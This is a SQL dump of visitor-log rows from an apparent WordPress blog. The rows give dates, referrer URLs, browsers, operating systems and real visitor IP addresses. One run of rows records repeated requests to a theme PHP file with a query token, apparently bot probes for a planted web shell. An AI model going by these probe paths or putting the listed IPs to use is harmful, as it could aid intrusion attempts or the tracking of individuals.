(23317,'2022-08-12','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','208.80.194.121','000',0,4,0),
(23318,'2022-08-12','http://wikisonnati.com/blog/','Opera','Windows','10.0',NULL,NULL,'','46.161.11.208','000',0,2,0),
(23319,'2022-08-12','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.44','000',0,3,0),
(23320,'2022-08-12','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','208.80.194.126','000',0,2,0),
(23321,'2022-08-12','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(23322,'2022-08-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','93.159.230.83','000',0,4,0),
(23323,'2022-08-12','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','212.71.233.51','000',0,2,0),
(23324,'2022-08-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','93.159.230.88','000',0,3,0),
(23325,'2022-08-12','http://ictbank.ir/blog','Firefox','AROS','Unknown',NULL,NULL,'','178.159.37.54','000',0,1,0),
(23326,'2022-08-12','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.52','000',0,2,0),
(23327,'2022-08-12','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','192.36.248.249','000',0,1,0),
(23328,'2022-08-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','77.74.177.119','000',0,3,0),
(23329,'2022-08-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.245.147.75','000',0,1,0),
(23330,'2022-08-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','93.159.230.89','000',0,2,0),
(23331,'2022-08-12','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(23332,'2022-08-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.187.177','000',0,1,0),
(23333,'2022-08-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.170.64','000',0,1,0),
(23334,'2022-08-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','46.101.79.124','000',0,1,0),
(23335,'2022-08-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.97.131.196','000',0,1,0),
(23336,'2022-08-12','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.31','000',0,1,0),
(23337,'2022-08-12','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,2,0),
(23338,'2022-08-13','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','208.80.194.126','000',0,3,0),
(23339,'2022-08-13','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','5.188.62.21','000',0,1,0),
(23340,'2022-08-13','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.119.81.109','000',0,10,0),
(23341,'2022-08-13','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.22','000',0,4,0),
(23342,'2022-08-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','46.161.11.227','000',0,1,0),
(23343,'2022-08-13','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.177.224.87','000',0,2,0),
(23344,'2022-08-13','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.40','000',0,6,0),
(23345,'2022-08-13','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.47','000',0,4,0),
(23346,'2022-08-13','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.26','000',0,16,0),
(23347,'2022-08-13','http://wikisonnati.com/blog/','Chrome','Windows','6.3',NULL,NULL,'','46.161.11.208','000',0,2,0),
(23348,'2022-08-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','145.255.22.241','000',0,6,0),
(23349,'2022-08-13','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.52','000',0,6,0),
(23350,'2022-08-13','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','208.80.194.121','000',0,4,0),
(23351,'2022-08-13','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','208.80.194.122','000',0,3,0),
(23352,'2022-08-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','163.123.143.187','000',0,1,0),
(23353,'2022-08-13','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','5.160.95.179','000',0,3,0),
(23354,'2022-08-13','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(23355,'2022-08-13','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.38','000',0,5,0),
(23356,'2022-08-13','http://82.102.9.14:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','185.7.214.117','000',0,9,0),
(23357,'2022-08-13','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.21','000',0,2,0),
(23358,'2022-08-13','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.225.16','000',0,2,0),
(23359,'2022-08-13','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.36','000',0,3,0),
(23360,'2022-08-13','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','34.212.196.3','000',0,1,0),
(23361,'2022-08-13','http://82.102.9.14:80/blog','Firefox','Windows','65.0','desktop','Unknown','','45.83.67.171','000',0,1,0),
(23362,'2022-08-13','http://ictbank.ir/blog','Chrome','Linux','58.0.3029.110','desktop','Unknown','','54.158.166.186','000',0,1,0),
(23363,'2022-08-13','http://ictbank.ir/blog/','Chrome','Windows','96.0.4664.110','desktop','Unknown','','209.97.135.165','000',0,1,0),
(23364,'2022-08-13','http://ictbank.ir/blog/','Chrome','Windows','96.0.4664.110','desktop','Unknown','','82.196.0.67','000',0,1,0),
(23365,'2022-08-13','http://ictbank.ir/blog/','Chrome','Windows','96.0.4664.110','desktop','Unknown','','188.166.158.7','000',0,1,0),
(23366,'2022-08-13','http://ictbank.ir/blog/','Chrome','Windows','96.0.4664.110','desktop','Unknown','','78.141.244.3','000',0,1,0),
(23367,'2022-08-13','http://mail.design-arena.ir/blog','Chrome','Windows','74.0.3729.169','desktop','Unknown','','173.249.58.188','000',0,2,0),
(23368,'2022-08-13','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,4,0),
(23369,'2022-08-13','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','162.221.192.90','000',0,2,0),
(23370,'2022-08-14','http://ictbank.ir/blog','Firefox','Windows','67.0','desktop','Unknown','','51.254.199.11','000',0,3,0),
(23371,'2022-08-14','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,16,0),
(23372,'2022-08-14','http://ictbank.ir/blog','Firefox','Windows','3.6.13','desktop','Unknown','','208.80.194.121','000',0,6,0),
(23373,'2022-08-14','http://ictbank.ir/blog','Chrome','Windows','83.0.4103.106','desktop','Unknown','','185.119.81.109','000',0,2,0),
(23374,'2022-08-14','http://ictbank.ir/blog','Chrome','Windows','31.0.1650.16','desktop','Unknown','','181.214.206.161','000',0,2,0),
(23375,'2022-08-14','http://ictbank.ir/blog/','Chrome','Windows','83.0.4100.3','desktop','Unknown','','46.161.11.227','000',0,1,0),
(23376,'2022-08-14','http://ictbank.ir/blog','Firefox','OS X','5.0.1','desktop','Macintosh','','208.80.194.126','000',0,3,0),
(23377,'2022-08-14','http://82.102.9.14:80/blog','Chrome','Windows','68.0.3440.106','desktop','Unknown','','161.35.213.143','000',0,2,0),
(23378,'2022-08-14','http://82.102.9.14/blog/wp-content/themes/chigue/wp_class_datalib.php?zzz=F5d4JH6m1','Internet Explorer','Windows','6.0','desktop','Unknown','','124.221.74.91','000',0,1,0),
(23379,'2022-08-14','http://82.102.9.14/blog/wp-content/themes/chigue/wp_class_datalib.php?zzz=F5d4JH6m1','Internet Explorer','Windows','6.0','desktop','Unknown','','183.89.99.61','000',0,1,0),
(23380,'2022-08-14','http://82.102.9.14/blog/wp-content/themes/chigue/wp_class_datalib.php?zzz=F5d4JH6m1','Internet Explorer','Windows','6.0','desktop','Unknown','','183.246.92.2','000',0,1,0),
(23381,'2022-08-14','http://82.102.9.14/blog/wp-content/themes/chigue/wp_class_datalib.php?zzz=F5d4JH6m1','Internet Explorer','Windows','6.0','desktop','Unknown','','81.68.203.157','000',0,1,0),
(23382,'2022-08-14','http://82.102.9.14/blog/wp-content/themes/chigue/wp_class_datalib.php?zzz=F5d4JH6m1','Internet Explorer','Windows','6.0','desktop','Unknown','','101.51.195.0','000',0,1,0),
(23383,'2022-08-14','http://82.102.9.14/blog/wp-content/themes/chigue/wp_class_datalib.php?zzz=F5d4JH6m1','Internet Explorer','Windows','6.0','desktop','Unknown','','121.4.59.99','000',0,1,0),
(23384,'2022-08-14','http://82.102.9.14/blog/wp-content/themes/chigue/wp_class_datalib.php?zzz=F5d4JH6m1','Internet Explorer','Windows','6.0','desktop','Unknown','','49.49.196.218','000',0,1,0),
(23385,'2022-08-14','http://82.102.9.14/blog/wp-content/themes/chigue/wp_class_datalib.php?zzz=F5d4JH6m1','Internet Explorer','Windows','6.0','desktop','Unknown','','183.88.86.133','000',0,1,0),
(23386,'2022-08-14','http://82.102.9.14/blog/wp-content/themes/chigue/wp_class_datalib.php?zzz=F5d4JH6m1','Internet Explorer','Windows','6.0','desktop','Unknown','','218.106.62.52','000',0,1,0),
(23387,'2022-08-14','http://82.102.9.14/blog/wp-content/themes/chigue/wp_class_datalib.php?zzz=F5d4JH6m1','Internet Explorer','Windows','6.0','desktop','Unknown','','20.87.42.216','000',0,1,0),
(23388,'2022-08-14','http://82.102.9.14/blog/wp-content/themes/chigue/wp_class_datalib.php?zzz=F5d4JH6m1','Internet Explorer','Windows','6.0','desktop','Unknown','','117.27.112.165','000',0,1,0),
(23389,'2022-08-14','http://82.102.9.14/blog/wp-content/themes/chigue/wp_class_datalib.php?zzz=F5d4JH6m1','Internet Explorer','Windows','6.0','desktop','Unknown','','81.68.154.196','000',0,1,0),
(23390,'2022-08-14','http://82.102.9.14/blog/wp-content/themes/chigue/wp_class_datalib.php?zzz=F5d4JH6m1','Internet Explorer','Windows','6.0','desktop','Unknown','','208.52.157.79','000',0,1,0),
(23391,'2022-08-14','http://82.102.9.14/blog/wp-content/themes/chigue/wp_class_datalib.php?zzz=F5d4JH6m1','Internet Explorer','Windows','6.0','desktop','Unknown','','81.69.171.159','000',0,1,0),
(23392,'2022-08-14','http://82.102.9.14/blog/wp-content/themes/chigue/wp_class_datalib.php?zzz=F5d4JH6m1','Internet Explorer','Windows','6.0','desktop','Unknown','','123.118.14.109','000',0,1,0),
(23393,'2022-08-14','http://82.102.9.14/blog/wp-content/themes/chigue/wp_class_datalib.php?zzz=F5d4JH6m1','Internet Explorer','Windows','6.0','desktop','Unknown','','203.113.9.154','000',0,1,0),
(23394,'2022-08-14','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.133.58','000',0,2,0),
(23395,'2022-08-14','http://ictbank.ir/blog','Safari','Windows','5.0.4','desktop','Unknown','','34.200.220.26','000',0,1,0),
(23396,'2022-08-14','http://ictbank.ir/blog','Edge','Windows','91.0.864.54','desktop','Unknown','','185.181.60.39','000',0,1,0),
(23397,'2022-08-14','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.197','000',0,2,0),
(23398,'2022-08-14','http://82.102.9.14/blog','Chrome','Windows','95.0.4638.69','desktop','Unknown','','185.220.101.163','000',0,1,0),
(23399,'2022-08-14','http://wikisonnati.com/blog/','Chrome','Windows','83.0.4087.0','desktop','Unknown','','46.161.11.208','000',0,2,0),
(23400,'2022-08-14','http://82.102.9.14/blog','Internet Explorer','Windows','10.0','desktop','Unknown','','80.94.92.52','000',0,2,0),
(23401,'2022-08-14','http://82.102.9.14:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','185.7.214.117','000',0,3,0),
(23402,'2022-08-14','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','34.221.150.132','000',0,1,0),
(23403,'2022-08-14','http://ictbank.ir/blog/','Chrome','Windows','96.0.4664.110','desktop','Unknown','','198.211.123.140','000',0,1,0),
(23404,'2022-08-14','http://ictbank.ir/blog/','Chrome','Windows','96.0.4664.110','desktop','Unknown','','188.166.158.7','000',0,2,0),
(23405,'2022-08-14','http://ictbank.ir/blog/','Chrome','Windows','96.0.4664.110','desktop','Unknown','','78.141.244.3','000',0,1,0),
(23406,'2022-08-14','http://wikisonnati.com/','Chrome','Windows','84.0.4147.89','desktop','Unknown','','51.159.37.178','000',0,2,0),
(23407,'2022-08-14','http://ictbank.ir/blog','Firefox','Windows','9.0.1','desktop','Unknown','','193.92.182.236','000',0,2,0),
(23408,'2022-08-14','http://ictbank.ir/blog','Firefox','Windows','9.0.1','desktop','Unknown','','78.81.171.161','000',0,2,0),
(23409,'2022-08-14','http://ictbank.ir/blog','Unknown','OS X','Unknown','desktop','Macintosh','','119.3.206.71','000',0,2,0),
(23410,'2022-08-14','http://ictbank.ir/blog','Chrome','OS X','39.0.2171.95','desktop','Macintosh','','116.203.244.49','000',0,1,0),
(23411,'2022-08-15','http://ictbank.ir/blog','Firefox','Windows','3.6.8','desktop','Unknown','','208.80.194.126','000',0,3,0),
(23412,'2022-08-15','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,16,0),
(23413,'2022-08-15','http://ictbank.ir/blog','Chrome','Windows','56.0.2924.87','desktop','Unknown','','185.119.81.98','000',0,6,0),
(23414,'2022-08-15','http://ictbank.ir/blog','Safari','iOS','9.0','mobile:smart','iPhone','','60.13.138.158','000',0,1,0),
(23415,'2022-08-15','http://82.102.9.14/','Chrome','OS X','17.0.963.56','desktop','Macintosh','','27.124.5.34','000',0,3,0),
(23416,'2022-08-15','http://ictbank.ir/blog','Firefox','OS X','3.6.11','desktop','Macintosh','','208.80.194.121','000',0,7,0),
(23417,'2022-08-15','http://82.102.9.14:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(23418,'2022-08-15','http://ictbank.ir/blog/','Chrome','Windows','83.0.4103.14','desktop','Unknown','','46.161.11.227','000',0,1,0),
(23419,'2022-08-15','http://82.102.9.14/blog','Internet Explorer','Windows','10.0','desktop','Unknown','','80.94.92.52','000',0,2,0),
(23420,'2022-08-15','http://wikisonnati.com/blog/','Edge','Windows','83.0.478.37','desktop','Unknown','','46.161.11.208','000',0,2,0),
(23421,'2022-08-15','http://ictbank.ir/blog','Chrome','Windows','84.0.4147.105','desktop','Unknown','','5.161.139.243','000',0,2,0),
(23422,'2022-08-15','https://www.bing.com/','Edge','Windows','104.0.1293.54','desktop','Unknown','','165.225.11.5','000',0,1,0),
(23423,'2022-08-15','http://82.102.9.14:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','185.7.214.117','000',0,4,0),
(23424,'2022-08-15','http://ictbank.ir/blog/','Chrome','Windows','96.0.4664.110','desktop','Unknown','','78.141.244.3','000',0,2,0),
(23425,'2022-08-15','http://ictbank.ir/blog/','Chrome','Windows','96.0.4664.110','desktop','Unknown','','45.32.144.195','000',0,1,0),
(23426,'2022-08-15','http://ictbank.ir/blog/','Chrome','Windows','96.0.4664.110','desktop','Unknown','','188.166.158.7','000',0,1,0),
(23427,'2022-08-15','http://ictbank.ir/blog','Chrome','Windows','84.0.4147.105','desktop','Unknown','','5.161.128.115','000',0,2,0),
(23428,'2022-08-15','http://ictbank.ir/blog','Chrome','Windows','11.0.696.68','desktop','Unknown','','208.80.194.122','000',0,1,0),
(23429,'2022-08-15','http://ictbank.ir/blog','Chrome','Windows','100.0.4896.127','desktop','Unknown','','5.188.62.21','000',0,3,0),
(23430,'2022-08-16','http://82.102.9.14:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','185.7.214.117','000',0,11,0),
(23431,'2022-08-16','http://ictbank.ir/blog','Firefox','Windows','3.6.18','desktop','Unknown','','208.80.194.126','000',0,6,0),
(23432,'2022-08-16','http://ictbank.ir/blog','Chrome','Windows','70.0.3538.67','desktop','Unknown','','185.119.81.98','000',0,2,0),
(23433,'2022-08-16','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,14,0),
(23434,'2022-08-16','http://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','85.159.215.220','000',0,2,0),
(23435,'2022-08-16','http://ictbank.ir/blog','Chrome','Windows','74.0.3729.169','desktop','Unknown','','173.212.240.227','000',0,1,0),
(23436,'2022-08-16','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','185.180.143.135','000',0,2,0),
(23437,'2022-08-16','http://ictbank.ir/blog','Firefox','Windows','9.0.1','desktop','Unknown','','208.80.194.121','000',0,1,0),
(23438,'2022-08-16','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','185.180.143.136','000',0,2,0),
(23439,'2022-08-16','http://82.102.9.14/blog','Internet Explorer','Windows','10.0','desktop','Unknown','','80.94.92.52','000',0,2,0),
(23440,'2022-08-16','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','181.214.206.161','000',0,2,0),
(23441,'2022-08-16','http://82.102.9.14:80','Arora','Linux','0.6','desktop','Unknown','','156.251.172.122','000',0,4,0),
(23442,'2022-08-16','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','139.162.215.70','000',0,2,0),
(23443,'2022-08-16','http://ictbank.ir/','Chrome','Windows','84.0.4147.89','desktop','Unknown','','51.159.36.101','000',0,2,0),
(23444,'2022-08-16','http://ictbank.ir/blog','Chrome','OS X','14.0.835.202','desktop','Macintosh','','208.80.194.122','000',0,3,0),
(23445,'2022-08-16','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','34.217.179.187','000',0,1,0),
(23446,'2022-08-16','http://ictbank.ir/blog','Chrome','OS X','39.0.2171.95','desktop','Macintosh','','161.97.74.103','000',0,2,0),
(23447,'2022-08-16','http://ictbank.ir/blog/','Chrome','Windows','96.0.4664.110','desktop','Unknown','','198.211.123.140','000',0,1,0),
(23448,'2022-08-16','http://ictbank.ir/blog/','Chrome','Windows','96.0.4664.110','desktop','Unknown','','108.61.123.152','000',0,1,0),
(23449,'2022-08-16','http://ictbank.ir/blog/','Chrome','Windows','96.0.4664.110','desktop','Unknown','','78.141.244.3','000',0,1,0),
(23450,'2022-08-16','http://ictbank.ir/blog/','Chrome','Windows','96.0.4664.110','desktop','Unknown','','46.101.79.124','000',0,1,0),
(23451,'2022-08-16','http://ictbank.ir/blog','Firefox','Windows','103.0','desktop','Unknown','','80.210.198.133','000',0,2,0),
(23452,'2022-08-16','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.90','desktop','Unknown','','180.149.125.164','000',0,1,0),
(23453,'2022-08-16','http://www.design-arena.ir/blog','Chrome','Windows','74.0.3729.169','desktop','Unknown','','173.249.0.74','000',0,2,0),
(23454,'2022-08-16','http://82.102.9.14/blog','Chrome','Windows','95.0.4638.69','desktop','Unknown','','185.220.101.188','000',0,1,0),
(23455,'2022-08-16','http://82.102.9.14:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(23456,'2022-08-17','http://ictbank.ir/blog','Firefox','Windows','3.6.7','desktop','Unknown','','208.80.194.126','000',0,6,0),
(23457,'2022-08-17','http://ictbank.ir/blog/index.php/category/os/linxu/oraclelinux/','Chrome','Windows','90.0.4430.93','desktop','Unknown','','46.161.11.144','000',0,7,0),
(23458,'2022-08-17','http://ictbank.ir/?feed=atom','Chrome','Windows','84.0.4147.105','desktop','Unknown','','51.159.37.51','000',0,1,0),
(23459,'2022-08-17','http://ictbank.ir/blog','Chrome','Windows','41.0.2228.0','desktop','Unknown','','51.254.59.113','000',0,1,0),
(23460,'2022-08-17','http://ictbank.ir/blog','Edge','Windows','103.0.1264.37','desktop','Unknown','','165.140.84.100','000',0,2,0),
(23461,'2022-08-17','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.121','000',0,4,0),
(23462,'2022-08-17','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown','','Unknown','','143.92.32.36','000',0,3,0),
(23463,'2022-08-17','http://ictbank.ir/blog','Chrome','OS X','91.0.4472.114','desktop','Macintosh','','18.118.226.168','000',0,5,0),
(23464,'2022-08-17','http://ictbank.ir/blog','Chrome','Windows','96.0.4664.110','desktop','Unknown','','185.119.81.98','000',0,4,0),
(23465,'2022-08-17','http://ictbank.ir/blog','Chrome','Windows','84.0.4147.105','desktop','Unknown','','5.161.137.174','000',0,1,0),
(23466,'2022-08-17','http://ictbank.ir/blog','Chrome','Windows','62.0.3202.89','desktop','Unknown','','185.119.81.99','000',0,2,0),
(23467,'2022-08-17','http://82.102.9.14:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','185.7.214.117','000',0,6,0),
(23468,'2022-08-17','http://ictbank.ir/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','27.254.85.199','000',0,1,0),
(23469,'2022-08-17','http://ictbank.ir/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','72.52.247.198','000',0,1,0),
(23470,'2022-08-17','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','54.212.223.221','000',0,1,0),
(23471,'2022-08-17','http://82.102.9.14/blog','Internet Explorer','Windows','10.0','desktop','Unknown','','92.118.39.86','000',0,2,0),
(23472,'2022-08-17','http://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','176.58.107.172','000',0,2,0),
(23473,'2022-08-17','http://ictbank.ir/blog/','Chrome','Windows','96.0.4664.110','desktop','Unknown','','209.97.131.196','000',0,1,0),
(23474,'2022-08-17','http://ictbank.ir/blog/','Chrome','Windows','96.0.4664.110','desktop','Unknown','','82.196.0.67','000',0,1,0),
(23475,'2022-08-17','http://ictbank.ir/blog/','Chrome','Windows','96.0.4664.110','desktop','Unknown','','46.101.79.124','000',0,1,0),
(23476,'2022-08-17','http://ictbank.ir/blog/','Chrome','Windows','96.0.4664.110','desktop','Unknown','','134.209.20.42','000',0,1,0),
(23477,'2022-08-17','http://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(23478,'2022-08-17','http://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','23.100.232.233','000',0,2,0),
(23479,'2022-08-17','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','185.180.143.18','000',0,2,0),
(23480,'2022-08-18','http://ictbank.ir/blog','Chrome','Windows','41.0.2228.0','desktop','Unknown','','23.250.19.242','000',0,2,0),
(23481,'2022-08-18','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','181.214.206.161','000',0,6,0),
(23482,'2022-08-18','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,2,0),
(23483,'2022-08-18','http://ictbank.ir/blog','Chrome','Windows','9.0.597.94','desktop','Unknown','','208.80.194.121','000',0,5,0),
(23484,'2022-08-18','http://82.102.9.14/blog','Chrome','Android','81.0.4044.138','mobile:smart','Nexus 5','','124.220.24.137','000',0,2,0),
(23485,'2022-08-18','https://www.bing.com','Chrome','Windows','41.0.2228.0','desktop','Unknown','','178.252.169.160','000',0,1,0),
(23486,'2022-08-18','http://ictbank.ir/blog','Chrome','Windows','74.0.3729.131','desktop','Unknown','','185.119.81.99','000',0,6,0),
(23487,'2022-08-18','http://ictbank.ir/blog','Chrome','OS X','14.0.835.202','desktop','Macintosh','','208.80.194.122','000',0,5,0),
(23488,'2022-08-18','http://82.102.9.14/blog','Internet Explorer','Windows','10.0','desktop','Unknown','','92.118.39.86','000',0,2,0),
(23489,'2022-08-18','https://www.bing.com','Chrome','Windows','41.0.2227.0','desktop','Unknown','','167.71.198.178','000',0,3,0),
(23490,'2022-08-18','http://82.102.9.14/blog','Firefox','Linux','73.0','desktop','Unknown','','143.198.2.95','000',0,2,0),
(23491,'2022-08-18','http://ictbank.ir/blog','Firefox','Windows','9.0.1','desktop','Unknown','','208.80.194.126','000',0,1,0),
(23492,'2022-08-18','http://ictbank.ir/blog','Chrome','Windows','74.0.3729.169','desktop','Unknown','','104.131.36.225','000',0,2,0),
(23493,'2022-08-18','http://82.102.9.14:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','185.7.214.117','000',0,5,0),
(23494,'2022-08-18','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','35.91.140.102','000',0,1,0),
(23495,'2022-08-18','http://82.102.9.14:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(23496,'2022-08-18','http://ictbank.ir/blog','Edge','Windows','18','desktop','Unknown','','147.78.47.233','000',0,5,0),
(23497,'2022-08-18','http://mail.design-arena.ir/blog','Chrome','Windows','74.0.3729.169','desktop','Unknown','','173.212.231.5','000',0,2,0),
(23498,'2022-08-18','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.39','000',0,2,0),
(23499,'2022-08-18','http://ictbank.ir/blog','Chrome','Windows','41.0.2228.0','desktop','Unknown','','51.254.59.113','000',0,1,0),
(23500,'2022-08-18','http://ictbank.ir/blog/','Chrome','Windows','96.0.4664.110','desktop','Unknown','','104.238.190.161','000',0,1,0),
(23501,'2022-08-18','http://ictbank.ir/blog/','Chrome','Windows','96.0.4664.110','desktop','Unknown','','45.77.62.18','000',0,1,0),
(23502,'2022-08-18','http://ictbank.ir/blog/','Chrome','Windows','96.0.4664.110','desktop','Unknown','','78.141.225.57','000',0,1,0),
(23503,'2022-08-18','http://ictbank.ir/blog/','Chrome','Windows','96.0.4664.110','desktop','Unknown','','209.97.131.196','000',0,1,0),
(23504,'2022-08-18','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.47','000',0,4,0),
(23505,'2022-08-18','http://www.ictbank.ir','Chrome','Windows','80.0.3987.132','desktop','Unknown','','45.88.97.214','000',0,2,0),
(23506,'2022-08-19','http://ictbank.ir/blog','Chrome','OS X','103.0.0.0','desktop','Macintosh','','23.226.31.35','000',0,1,0),
(23507,'2022-08-19','http://ictbank.ir/blog','Chrome','OS X','91.0.4472.114','desktop','Macintosh','','3.142.42.181','000',0,4,0),
(23508,'2022-08-19','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.90','desktop','Unknown','','180.149.125.173','000',0,1,0),
(23509,'2022-08-19','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.21','000',0,1,0),
(23510,'2022-08-19','http://ictbank.ir/blog','Safari','OS X','5.1','desktop','Macintosh','','208.80.194.121','000',0,5,0),
(23511,'2022-08-19','http://82.102.9.14/blog','Internet Explorer','Windows','10.0','desktop','Unknown','','92.118.39.86','000',0,2,0),
(23512,'2022-08-19','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.41','000',0,7,0),
(23513,'2022-08-19','http://82.102.9.14/blog','Chrome','Windows','49.0.2623.112','desktop','Unknown','','119.60.104.113','000',0,1,0),
(23514,'2022-08-19','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','162.221.192.26','000',0,2,0),
(23515,'2022-08-19','http://82.102.9.14:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','185.7.214.117','000',0,3,0),
(23516,'2022-08-19','http://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','178.79.131.5','000',0,2,0),
(23517,'2022-08-19','http://82.102.9.14/blog','Internet Explorer','Windows','10.0','desktop','Unknown','','198.98.49.79','000',0,2,0),
(23518,'2022-08-19','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,2,0),
(23519,'2022-08-19','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.209.162','000',0,2,0),
(23520,'2022-08-19','http://ictbank.ir/blog','Chrome','OS X','51.0.2704.84','desktop','Macintosh','','199.244.88.232','000',0,1,0),
(23521,'2022-08-19','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(23522,'2022-08-19','http://www.design-arena.ir','Chrome','Windows','80.0.3987.132','desktop','Unknown','','45.88.97.214','000',0,6,0),
(23523,'2022-08-19','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','35.90.75.187','000',0,1,0),
(23524,'2022-08-19','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.54','000',0,8,0),
(23525,'2022-08-19','http://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','23.100.232.233','000',0,2,0),
